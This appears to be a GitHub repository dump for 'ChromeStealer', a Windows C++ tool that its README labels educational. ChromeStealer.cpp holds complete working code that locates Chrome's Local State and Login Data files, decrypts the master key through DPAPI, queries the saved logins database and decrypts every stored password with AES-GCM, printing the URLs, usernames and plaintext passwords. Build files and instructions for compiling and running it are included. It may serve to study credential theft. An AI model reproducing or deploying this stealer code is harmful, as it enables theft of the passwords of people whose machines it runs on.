[ { "path": ".gitattributes", "content": "###############################################################################\n# Set default behavior to automatically normalize line endings.\n###############################################################################\n* text=auto\n\n###############################################################################\n# Set default behavior for command prompt diff.\n#\n# This is need for earlier builds of msysgit that does not have it on by\n# default for csharp files.\n# Note: This is only used by command line\n###############################################################################\n#*.cs diff=csharp\n\n###############################################################################\n# Set the merge driver for project and solution files\n#\n# Merging from the command prompt will add diff markers to the files if there\n# are conflicts (Merging from VS is not affected by the settings below, in VS\n# the diff markers are never inserted). Diff markers may cause the following \n# file extensions to fail to load in VS. An alternative would be to treat\n# these files as binary and thus will always conflict and require user\n# intervention with every merge. To do so, just uncomment the entries below\n###############################################################################\n#*.sln merge=binary\n#*.csproj merge=binary\n#*.vbproj merge=binary\n#*.vcxproj merge=binary\n#*.vcproj merge=binary\n#*.dbproj merge=binary\n#*.fsproj merge=binary\n#*.lsproj merge=binary\n#*.wixproj merge=binary\n#*.modelproj merge=binary\n#*.sqlproj merge=binary\n#*.wwaproj merge=binary\n\n###############################################################################\n# behavior for image files\n#\n# image files are treated as binary by default.\n###############################################################################\n#*.jpg binary\n#*.png binary\n#*.gif binary\n\n###############################################################################\n# diff behavior for common document formats\n# \n# Convert binary document formats to text before diffing them. This feature\n# is only available from the command line. Turn it on by uncommenting the \n# entries below.\n###############################################################################\n#*.doc diff=astextplain\n#*.DOC diff=astextplain\n#*.docx diff=astextplain\n#*.DOCX diff=astextplain\n#*.dot diff=astextplain\n#*.DOT diff=astextplain\n#*.pdf diff=astextplain\n#*.PDF diff=astextplain\n#*.rtf diff=astextplain\n#*.RTF diff=astextplain\n" }, { "path": ".gitignore", "content": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore\n\n# User-specific files\n*.rsuser\n*.suo\n*.user\n*.userosscache\n*.sln.docstates\n\n# User-specific files (MonoDevelop/Xamarin Studio)\n*.userprefs\n\n# Mono auto generated files\nmono_crash.*\n\n# Build results\n[Dd]ebug/\n[Dd]ebugPublic/\n[Rr]elease/\n[Rr]eleases/\nx64/\nx86/\n[Ww][Ii][Nn]32/\n[Aa][Rr][Mm]/\n[Aa][Rr][Mm]64/\nbld/\n[Bb]in/\n[Oo]bj/\n[Ll]og/\n[Ll]ogs/\n\n# Visual Studio 2015/2017 cache/options directory\n.vs/\n# Uncomment if you have tasks that create the project's static files in wwwroot\n#wwwroot/\n\n# Visual Studio 2017 auto generated files\nGenerated\\ Files/\n\n# MSTest test Results\n[Tt]est[Rr]esult*/\n[Bb]uild[Ll]og.*\n\n# NUnit\n*.VisualState.xml\nTestResult.xml\nnunit-*.xml\n\n# Build Results of an ATL Project\n[Dd]ebugPS/\n[Rr]eleasePS/\ndlldata.c\n\n# Benchmark Results\nBenchmarkDotNet.Artifacts/\n\n# .NET Core\nproject.lock.json\nproject.fragment.lock.json\nartifacts/\n\n# ASP.NET Scaffolding\nScaffoldingReadMe.txt\n\n# StyleCop\nStyleCopReport.xml\n\n# Files built by Visual Studio\n*_i.c\n*_p.c\n*_h.h\n*.ilk\n*.meta\n*.obj\n*.iobj\n*.pch\n*.pdb\n*.ipdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.tmp_proj\n*_wpftmp.csproj\n*.log\n*.tlog\n*.vspscc\n*.vssscc\n.builds\n*.pidb\n*.svclog\n*.scc\n\n# Chutzpah Test files\n_Chutzpah*\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opendb\n*.opensdf\n*.sdf\n*.cachefile\n*.VC.db\n*.VC.VC.opendb\n\n# Visual Studio profiler\n*.psess\n*.vsp\n*.vspx\n*.sap\n\n# Visual Studio Trace Files\n*.e2e\n\n# TFS 2012 Local Workspace\n$tf/\n\n# Guidance Automation Toolkit\n*.gpState\n\n# ReSharper is a .NET coding add-in\n_ReSharper*/\n*.[Rr]e[Ss]harper\n*.DotSettings.user\n\n# TeamCity is a build add-in\n_TeamCity*\n\n# DotCover is a Code Coverage Tool\n*.dotCover\n\n# AxoCover is a Code Coverage Tool\n.axoCover/*\n!.axoCover/settings.json\n\n# Coverlet is a free, cross platform Code Coverage Tool\ncoverage*.json\ncoverage*.xml\ncoverage*.info\n\n# Visual Studio code coverage results\n*.coverage\n*.coveragexml\n\n# NCrunch\n_NCrunch_*\n.*crunch*.local.xml\nnCrunchTemp_*\n\n# MightyMoose\n*.mm.*\nAutoTest.Net/\n\n# Web workbench (sass)\n.sass-cache/\n\n# Installshield output folder\n[Ee]xpress/\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish/\n\n# Publish Web Output\n*.[Pp]ublish.xml\n*.azurePubxml\n# Note: Comment the next line if you want to checkin your web deploy settings,\n# but database connection strings (with potential passwords) will be unencrypted\n*.pubxml\n*.publishproj\n\n# Microsoft Azure Web App publish settings. Comment the next line if you want to\n# checkin your Azure Web App publish settings, but sensitive information contained\n# in these scripts will be unencrypted\nPublishScripts/\n\n# NuGet Packages\n*.nupkg\n# NuGet Symbol Packages\n*.snupkg\n# The packages folder can be ignored because of Package Restore\n**/[Pp]ackages/*\n# except build/, which is used as an MSBuild target.\n!**/[Pp]ackages/build/\n# Uncomment if necessary however generally it will be regenerated when needed\n#!**/[Pp]ackages/repositories.config\n# NuGet v3's project.json files produces more ignorable files\n*.nuget.props\n*.nuget.targets\n\n# Microsoft Azure Build Output\ncsx/\n*.build.csdef\n\n# Microsoft Azure Emulator\necf/\nrcf/\n\n# Windows Store app package directories and files\nAppPackages/\nBundleArtifacts/\nPackage.StoreAssociation.xml\n_pkginfo.txt\n*.appx\n*.appxbundle\n*.appxupload\n\n# Visual Studio cache files\n# files ending in .cache can be ignored\n*.[Cc]ache\n# but keep track of directories ending in .cache\n!?*.[Cc]ache/\n\n# Others\nClientBin/\n~$*\n*~\n*.dbmdl\n*.dbproj.schemaview\n*.jfm\n*.pfx\n*.publishsettings\norleans.codegen.cs\n\n# Including strong name files can present a security risk\n# (https://github.com/github/gitignore/pull/2483#issue-259490424)\n#*.snk\n\n# Since there are multiple workflows, uncomment next line to ignore bower_components\n# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)\n#bower_components/\n\n# RIA/Silverlight projects\nGenerated_Code/\n\n# Backup & report files from converting an old project file\n# to a newer Visual Studio version. Backup files are not needed,\n# because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\nUpgradeLog*.htm\nServiceFabricBackup/\n*.rptproj.bak\n\n# SQL Server files\n*.mdf\n*.ldf\n*.ndf\n\n# Business Intelligence projects\n*.rdl.data\n*.bim.layout\n*.bim_*.settings\n*.rptproj.rsuser\n*- [Bb]ackup.rdl\n*- [Bb]ackup ([0-9]).rdl\n*- [Bb]ackup ([0-9][0-9]).rdl\n\n# Microsoft Fakes\nFakesAssemblies/\n\n# GhostDoc plugin setting file\n*.GhostDoc.xml\n\n# Node.js Tools for Visual Studio\n.ntvs_analysis.dat\nnode_modules/\n\n# Visual Studio 6 build log\n*.plg\n\n# Visual Studio 6 workspace options file\n*.opt\n\n# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)\n*.vbw\n\n# Visual Studio 6 auto-generated project file (contains which files were open etc.)\n*.vbp\n\n# Visual Studio 6 workspace and project file (working project files containing files to include in project)\n*.dsw\n*.dsp\n\n# Visual Studio 6 technical files\n*.ncb\n*.aps\n\n# Visual Studio LightSwitch build output\n**/*.HTMLClient/GeneratedArtifacts\n**/*.DesktopClient/GeneratedArtifacts\n**/*.DesktopClient/ModelManifest.xml\n**/*.Server/GeneratedArtifacts\n**/*.Server/ModelManifest.xml\n_Pvt_Extensions\n\n# Paket dependency manager\n.paket/paket.exe\npaket-files/\n\n# FAKE - F# Make\n.fake/\n\n# CodeRush personal settings\n.cr/personal\n\n# Python Tools for Visual Studio (PTVS)\n__pycache__/\n*.pyc\n\n# Cake - Uncomment if you are using it\n# tools/**\n# !tools/packages.config\n\n# Tabs Studio\n*.tss\n\n# Telerik's JustMock configuration file\n*.jmconfig\n\n# BizTalk build output\n*.btp.cs\n*.btm.cs\n*.odx.cs\n*.xsd.cs\n\n# OpenCover UI analysis results\nOpenCover/\n\n# Azure Stream Analytics local run output\nASALocalRun/\n\n# MSBuild Binary and Structured Log\n*.binlog\n\n# NVidia Nsight GPU debugger configuration file\n*.nvuser\n\n# MFractors (Xamarin productivity tool) working folder\n.mfractor/\n\n# Local History for Visual Studio\n.localhistory/\n\n# Visual Studio History (VSHistory) files\n.vshistory/\n\n# BeatPulse healthcheck temp database\nhealthchecksdb\n\n# Backup folder for Package Reference Convert tool in Visual Studio 2017\nMigrationBackup/\n\n# Ionide (cross platform F# VS Code tools) working folder\n.ionide/\n\n# Fody - auto-generated XML schema\nFodyWeavers.xsd\n\n# VS Code files for those working on multiple tools\n.vscode/*\n!.vscode/settings.json\n!.vscode/tasks.json\n!.vscode/launch.json\n!.vscode/extensions.json\n*.code-workspace\n\n# Local History for Visual Studio Code\n.history/\n\n# Windows Installer files from build outputs\n*.cab\n*.msi\n*.msix\n*.msm\n*.msp\n\n# JetBrains Rider\n*.sln.iml\n" }, { "path": "ChromeStealer.cpp", "content": "#include \"ChromeStealer.h\"\n\n\n//Check if WIndows system\n#ifdef _WIN32\n\n\n// Checks if Google Chrome is installed on the machine.\n// This function queries the Windows Registry to check if the registry key\n// for Chrome's installation path exists.\n// @return True if Chrome is installed, false otherwise.\nbool IsChromeInstalled() {\n HKEY hKey;\n // Open the registry key for Chrome's installation path.\n LONG lRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,\n L\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths\\\\chrome.exe\",\n 0, KEY_READ, &hKey);\n\n // If the key exists, Chrome is installed.\n if (lRes == ERROR_SUCCESS) {\n RegCloseKey(hKey);\n return true;\n }\n else {\n return false;\n }\n}\n\n// Finds the path to the Local State file.\n// This function retrieves the user's profile path and constructs the path to\n// the Local State file used by Google Chrome.\n// @return The path to the Local State file as a wide string.\nstd::wstring FindLocalState() {\n WCHAR userProfile[MAX_PATH];\n HRESULT result = SHGetFolderPathW(NULL, CSIDL_PROFILE, NULL, 0, userProfile);\n\n if (!SUCCEEDED(result)) {\n warn(\"Error getting user path. Error: %ld\", GetLastError());\n return L\"\";\n }\n\n WCHAR localStatePath[MAX_PATH];\n _snwprintf_s(localStatePath, MAX_PATH, _TRUNCATE, L\"%s\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State\", userProfile);\n okay(\"Full path to Local State file: %ls\", localStatePath);\n return std::wstring(localStatePath);\n}\n\n// Finds the path to the Login Data file.\n// This function retrieves the user's profile path and constructs the path to\n// the Login Data file used by Google Chrome.\n// @return The path to the Login Data file as a wide string.\nstd::wstring FindLoginData() {\n WCHAR userProfile[MAX_PATH];\n //CSIDL_PROFILE macro for USER PROFILE\n HRESULT result = SHGetFolderPathW(NULL, CSIDL_PROFILE, NULL, 0, userProfile);\n\n if (!SUCCEEDED(result)) {\n warn(\"Error getting user path. Error: %ld\", GetLastError());\n return L\"\";\n }\n\n WCHAR loginDataPath[MAX_PATH];\n _snwprintf_s(loginDataPath, MAX_PATH, L\"%s\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data\", userProfile);\n okay(\"Full path to Login Data file: %ls\", loginDataPath);\n return std::wstring(loginDataPath);\n}\n\n// Retrieves the encrypted key from the Local State file.\n// This function reads the Local State file in JSON format and extracts the\n// encrypted key used by Google Chrome.\n// @param localStatePath The path to the Local State file.\n// @return The encrypted key as a string.\nstd::string getEncryptedKey(const std::wstring& localStatePath) {\n std::ifstream file(localStatePath);\n if (!file.is_open()) {\n warn(\"Error opening the file. Error: %ld\", GetLastError());\n return \"\";\n }\n json localState = json::parse(file);\n file.close();\n\n auto itOsEncrypt = localState.find(\"os_crypt\");\n if (itOsEncrypt == localState.end() || !itOsEncrypt.value().is_object()) {\n warn(\"Key os_crypt not found or not an object.\");\n return \"\";\n }\n okay(\"Key os_crypt found.\");\n\n auto itEncryptedKey = itOsEncrypt.value().find(\"encrypted_key\");\n if (itEncryptedKey == itOsEncrypt.value().end()) {\n warn(\"Key encrypted_key not found or not an object\");\n return \"\";\n }\n\n okay(\"Key encrypted_key found\");\n std::string encryptedKey = itEncryptedKey.value();\n //okay(\"Value at key encrypted_key: %s\", encryptedKey.c_str());\n\n return encryptedKey;\n}\n\n// Decrypts an encrypted key using the CryptUnprotectData function.\n// This function decodes a Base64-encoded string and decrypts it to retrieve\n// the original key.\n// @param encrypted_key The encrypted key as a Base64-encoded string.\n// @return The decrypted key as a DATA_BLOB structure.\nDATA_BLOB decryptKey(const std::string& encrypted_key) {\n if (encrypted_key.empty()) {\n warn(\"Input string is empty.\");\n return {};\n }\n\n DWORD decodedBinarySize = 0;\n if (!CryptStringToBinaryA(encrypted_key.c_str(), 0, CRYPT_STRING_BASE64, NULL, &decodedBinarySize, NULL, NULL)) {\n warn(\"Error decoding Base64 string first step. Error: %ld\\n\", GetLastError());\n return {};\n }\n\n if (decodedBinarySize == 0) {\n warn(\"Decoded binary size is zero.\");\n return {};\n }\n\n std::vector decodedBinaryData(decodedBinarySize);\n if (!CryptStringToBinaryA(encrypted_key.c_str(), 0, CRYPT_STRING_BASE64, decodedBinaryData.data(), &decodedBinarySize, NULL, NULL)) {\n warn(\"Error decoding Base64 string second step. Error: %ld\\n\", GetLastError());\n return {};\n }\n\n if (decodedBinaryData.size() < 5) {\n warn(\"Decoded binary data size is too small.\\n\");\n return {};\n }\n decodedBinaryData.erase(decodedBinaryData.begin(), decodedBinaryData.begin() + 5);\n\n DATA_BLOB DataInput;\n DATA_BLOB DataOutput;\n\n DataInput.cbData = static_cast(decodedBinaryData.size());\n DataInput.pbData = decodedBinaryData.data();\n\n if (!CryptUnprotectData(&DataInput, NULL, NULL, NULL, NULL, 0, &DataOutput)) {\n warn(\"Error decrypting data. Error %ld\", GetLastError());\n LocalFree(DataOutput.pbData);\n return {};\n }\n //info(\"The decrypted data is: %s\", DataOutput.pbData);\n\n return DataOutput;\n}\n\n// Parses the Login Data file to extract and decrypt login credentials.\n// This function opens the Login Data SQLite database, executes a query to retrieve login\n// credentials, and decrypts the passwords using the provided decryption key.\n// @param loginDataPath The path to the Login Data file.\n// @param decryptionKey The key used to decrypt the login data.\n// @return An integer indicating success (0) or failure (non-zero).\nint loginDataParser(const std::wstring& loginDataPath, DATA_BLOB decryptionKey) {\n sqlite3* loginDataBase = nullptr;\n int openingStatus = 0;\n\n std::wstring copyLoginDataPath = loginDataPath;\n copyLoginDataPath.append(L\"a\");\n\n if (!CopyFileW(loginDataPath.c_str(), copyLoginDataPath.c_str(), FALSE)) {\n warn(\"Error copying the file. Error: %ld\", GetLastError());\n return EXIT_FAILURE;\n }\n\n using convert_type = std::codecvt_utf8;\n std::wstring_convert converter;\n std::string string_converted_path = converter.to_bytes(copyLoginDataPath);\n\n openingStatus = sqlite3_open_v2(string_converted_path.c_str(), &loginDataBase, SQLITE_OPEN_READONLY, nullptr);\n\n if (openingStatus) {\n warn(\"Can't open database: %s\", sqlite3_errmsg(loginDataBase));\n sqlite3_close(loginDataBase);\n\n if (!DeleteFileW(copyLoginDataPath.c_str())) {\n warn(\"Error deleting the file. Error: %ld\", GetLastError());\n return EXIT_FAILURE;\n }\n\n return openingStatus;\n }\n\n const char* sql = \"SELECT origin_url, username_value, password_value, blacklisted_by_user FROM logins\";\n sqlite3_stmt* stmt = nullptr;\n openingStatus = sqlite3_prepare_v2(loginDataBase, sql, -1, &stmt, nullptr);\n\n if (openingStatus != SQLITE_OK) {\n warn(\"SQL error: %s\", sqlite3_errmsg(loginDataBase));\n sqlite3_close(loginDataBase);\n\n if (!DeleteFileW(copyLoginDataPath.c_str())) {\n warn(\"Error deleting the file. Error: %ld\", GetLastError());\n return EXIT_FAILURE;\n }\n\n return openingStatus;\n }\n\n okay(\"Executed SQL Query.\");\n\n while ((openingStatus = sqlite3_step(stmt)) == SQLITE_ROW) {\n const unsigned char* originUrl = sqlite3_column_text(stmt, 0);\n const unsigned char* usernameValue = sqlite3_column_text(stmt, 1);\n const void* passwordBlob = sqlite3_column_blob(stmt, 2);\n int passwordSize = sqlite3_column_bytes(stmt, 2);\n int blacklistedByUser = sqlite3_column_int(stmt, 3);\n\n if (originUrl != NULL && originUrl[0] != '\\0' &&\n usernameValue != NULL && usernameValue[0] != '\\0' &&\n passwordBlob != NULL && blacklistedByUser != 1) {\n\n unsigned char iv[IV_SIZE];\n if (passwordSize >= (IV_SIZE + 3)) {\n memcpy(iv, (unsigned char*)passwordBlob + 3, IV_SIZE);\n }\n else {\n warn(\"Password size too small to generate IV\");\n continue;\n }\n\n if (passwordSize <= (IV_SIZE + 3)) {\n warn(\"Password size too small\");\n continue;\n }\n\n BYTE* Password = (BYTE*)malloc(passwordSize - (IV_SIZE + 3));\n if (Password == NULL) {\n warn(\"Memory allocation failed\");\n continue;\n }\n memcpy(Password, (unsigned char*)passwordBlob + (IV_SIZE + 3), passwordSize - (IV_SIZE + 3));\n\n unsigned char decrypted[1024];\n decryptPassword(Password, passwordSize - (IV_SIZE + 3), decryptionKey.pbData, iv, decrypted);\n decrypted[passwordSize - (IV_SIZE + 3)] = '\\0';\n\n okay(\"Origin URL: %s\", originUrl);\n okay(\"Username Value: %s\", usernameValue);\n okay(\"Password: %s\", decrypted);\n\n free(Password);\n\n info(\"----------------------------------\");\n }\n }\n\n if (openingStatus != SQLITE_DONE) {\n warn(\"SQL error or end of data: %s\", sqlite3_errmsg(loginDataBase));\n }\n\n sqlite3_finalize(stmt);\n sqlite3_close(loginDataBase);\n\n if (!DeleteFileW(copyLoginDataPath.c_str())) {\n warn(\"Error deleting the file. Error: %ld\", GetLastError());\n return EXIT_FAILURE;\n }\n\n return EXIT_SUCCESS;\n}\n\n// Decrypts a password using the provided key and initialization vector (IV).\n// This function uses the libsodium library to decrypt the ciphertext.\n// @param ciphertext The encrypted password.\n// @param ciphertext_len The length of the encrypted password.\n// @param key The key used for decryption.\n// @param iv The initialization vector used for decryption.\n// @param decrypted The buffer to store the decrypted password.\nvoid decryptPassword(unsigned char* ciphertext, size_t ciphertext_len, unsigned char* key, unsigned char* iv, unsigned char* decrypted) {\n unsigned long long decrypted_len;\n\n if (sodium_init() < 0) {\n fprintf(stderr, \"Failed to initialize libsodium\\n\");\n return;\n }\n\n int result = crypto_aead_aes256gcm_decrypt(\n decrypted, &decrypted_len,\n NULL,\n ciphertext, ciphertext_len,\n NULL, 0,\n iv, key\n );\n\n if (result != 0) {\n fprintf(stderr, \"Decryption failed\\n\");\n }\n else {\n decrypted[decrypted_len] = '\\0';\n }\n}\n\nvoid displayMenu() {\n printf(\"Menu:\\n\");\n printf(\"1. Proceed with decryption\\n\");\n printf(\"2. Quit\\n\");\n printf(\"Enter your choice: \");\n}\n\nint main() {\n#ifdef _WIN32\n\n printf(YELLOW // Set text color to purple\n \"________________________________________________________________________________________\\n\"\n \"_________ .__ _________ __ .__ \\n\"\n \"\\\\_ ___ \\\\| |_________ ____ _____ ____ / _____// |_ ____ _____ | | ___________\\n\"\n \"/ \\\\ \\\\/| | \\\\_ __ \\\\/ _ \\\\ / \\\\_/ __ \\\\ \\\\_____ \\\\\\\\ __\\\\/ __ \\\\\\\\__ \\\\ | | _/ __ \\\\_ __ \\\\\\n\"\n \"\\\\ \\\\___| Y \\\\ | \\\\( <_> ) Y Y \\\\ ___/ / \\\\| | \\\\ ___/ / __ \\\\| |_\\\\ ___/| | \\\\/\\n\"\n \" \\\\______ /___| /__| \\\\____/|__|_| /\\\\___ > /_______ /|__| \\\\___ >____ /____/\\\\___ >__| \\n\"\n \" \\\\/ \\\\/ \\\\/ \\\\/ \\\\/ \\\\/ \\\\/ \\\\/ \\n\"\n \"________________________________________________________________________________________\\n\"\n RESET // Reset text color\n \"\\n\"\n \" Made by Bernking\\n\"\n \" For educational purposes only\\n\"\n \" Check my GitHub: https://github.com/BernKing\\n\"\n \" Check my blog: https://bernking.github.io/\\n\"\n );\n\n printf(\"\\n\\n\");\n\n int choice = 0;\n displayMenu();\n scanf_s(\"%d\", &choice);\n\n switch (choice) {\n case 1:\n if (IsChromeInstalled()) {\n\n okay(\"Google Chrome is installed.\");\n std::wstring localStatePath = FindLocalState();\n std::wstring loginDataPath = FindLoginData();\n\n std::string encryptedKey = getEncryptedKey(localStatePath);\n DATA_BLOB decryptionKey = decryptKey(encryptedKey);\n\n int parser = loginDataParser(loginDataPath, decryptionKey);\n\n\n LocalFree(decryptionKey.pbData);\n }\n else {\n warn(\"Google Chrome is not installed. Shutting down.\");\n }\n break;\n case 2:\n okay(\"Exiting the program.\");\n break;\n default:\n warn(\"Invalid choice. Exiting the program.\");\n break;\n }\n\n return EXIT_SUCCESS;\n\n#else\n warn(\"This program only runs on Windows systems.\\n\");\n return EXIT_FAILURE;\n#endif\n}\n\n#endif // _WIN32" }, { "path": "ChromeStealer.h", "content": "#pragma once\n\n#ifdef _WIN32\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n// Link against the required libraries\n#pragma comment(lib, \"Crypt32.lib\")\n#pragma comment(lib, \"Shell32.lib\")\n#pragma comment(lib, \"Advapi32.lib\")\n\n\n//using namespace std;\nusing json = nlohmann::json;\n\n#define MAX_LINE_LENGTH 1024\n#define IV_SIZE 12\n\n#define EXIT_FAILURE 1\n#define EXIT_SUCCESS 0\n\n// ANSI escape codes for colors\n#define RESET \"\\033[0m\"\n#define PURPLE \"\\033[35m\"\n#define GREEN \"\\033[32m\"\n#define YELLOW \"\\033[33m\"\n\n#define okay(msg, ...) printf(GREEN \"[+] \" RESET msg \"\\n\", ##__VA_ARGS__)\n#define warn(msg, ...) printf(PURPLE \"[-] \" RESET msg \"\\n\", ##__VA_ARGS__)\n#define info(msg, ...) printf(YELLOW \"[i] \" RESET msg \"\\n\", ##__VA_ARGS__)\n\n//Checks if Chrome is installed in the local machine.\n//@turn a bool stating if it is installed or not.\nbool IsChromeInstalled();\n\n// Finds the path to the Local State file.\n// @return The path to the Local State file as a wide string.\nstd::wstring FindLocalState();\n\n// Finds the path to the Login Data file.\n// @return The path to the Login Data file as a wide string.\nstd::wstring FindLoginData();\n\n// Retrieves the encrypted key from the Local State file.\n// @param localStatePath The path to the Local State file.\n// @return The encrypted key as a string.\nstd::string getEncryptedKey(const std::wstring& localStatePath);\n\n// Parses the Login Data file to extract login credentials.\n// @param loginDataPath The path to the Login Data file.\n// @param decryptionKey The key used to decrypt the login data.\n// @return An integer indicating success (0) or failure (non-zero).\nint loginDataParser(const std::wstring& loginDataPath, DATA_BLOB decryptionKey);\n\n// Decrypts an encrypted key.\n// @param encrypted_key The encrypted key as a string.\n// @return The decrypted key as a DATA_BLOB structure.\nDATA_BLOB decryptKey(const std::string& encrypted_key);\n\n// Decrypts a password using the provided key and initialization vector (IV).\n// @param ciphertext The encrypted password.\n// @param ciphertext_len The length of the encrypted password.\n// @param key The key used for decryption.\n// @param iv The initialization vector used for decryption.\n// @param decrypted The buffer to store the decrypted password.\nvoid decryptPassword(unsigned char* ciphertext, size_t ciphertext_len, unsigned char* key, unsigned char* iv, unsigned char* decrypted);\n\n\n#endif // _WIN32\n" }, { "path": "ChromeStealer.sln", "content": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 17\nVisualStudioVersion = 17.8.34330.188\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"ChromeStealer\", \"ChromeStealer.vcxproj\", \"{C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Debug|x64.Build.0 = Debug|x64\n\t\t{C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Debug|x86.Build.0 = Debug|Win32\n\t\t{C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Release|x64.ActiveCfg = Release|x64\n\t\t{C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Release|x64.Build.0 = Release|x64\n\t\t{C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Release|x86.ActiveCfg = Release|Win32\n\t\t{C7C8B6FB-4E59-494E-AEEB-40CF342A7E88}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {9B2B5CA5-4922-42FF-A48F-A44EEDB866EE}\n\tEndGlobalSection\nEndGlobal\n" }, { "path": "ChromeStealer.vcxproj", "content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n 17.0\n Win32Proj\n {c7c8b6fb-4e59-494e-aeeb-40cf342a7e88}\n ChromeStealer\n 10.0\n \n \n \n Application\n true\n v143\n Unicode\n \n \n Application\n false\n v143\n true\n Unicode\n \n \n Application\n true\n v143\n Unicode\n \n \n Application\n false\n v143\n true\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n Level3\n true\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n \n \n \n \n Level3\n true\n true\n true\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n true\n \n \n \n \n Level3\n true\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n MultiThreadedDebug\n \n \n Console\n true\n \n \n \n \n \n \n \n \n Level3\n true\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n true\n \n \n \n \n \n \n \n \n \n \n \n" }, { "path": "ChromeStealer.vcxproj.filters", "content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n \n \n Source Files\n \n \n \n \n Header Files\n \n \n" }, { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2024 BernKing\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "
\n

ChromeStealer

\n
\n\n

ChromeStealer is a tool for educational purposes to demonstrate how to extract and decrypt stored passwords from Google Chrome on a Windows system using C/C++.
Created by @bernKing20.

\n
\n
\n\n## Overview\n\nChromeStealer was created because existing write-ups and C/C++ versions either didn't work or didn't satisfy me enough. I hope that the write-up helps other people who were in the same position as me.\n\n## Dependencies\n\nThis project uses the following libraries:\n\n1. [libsodium](https://libsodium.gitbook.io/doc/)\n2. [nlohmann/json](https://github.com/nlohmann/json)\n3. [sqlite3](https://www.sqlite.org/index.html)\n\n## Installation\n\nThis project uses [vcpkg](https://vcpkg.io/) to manage dependencies. Ensure you have vcpkg installed and integrated with Visual Studio 2022.\n\n1. Clone the repository:\n\n ```sh\n git clone https://github.com/BernKing/ChromeStealer.git\n cd ChromeStealer\n ```\n\n2. Install the dependencies using vcpkg:\n\n ```sh\n vcpkg install libsodium jsoncpp sqlite3\n ```\n\n3. Open the project in Visual Studio 2022.\n\n## Usage\n\n1. Build the project in Visual Studio 2022.\n2. Run the executable. Follow the on-screen instructions to extract and decrypt stored passwords from Google Chrome.\n\n## Full Write-Up\n\nFor a detailed explanation of the project, visit the full write-up at [my 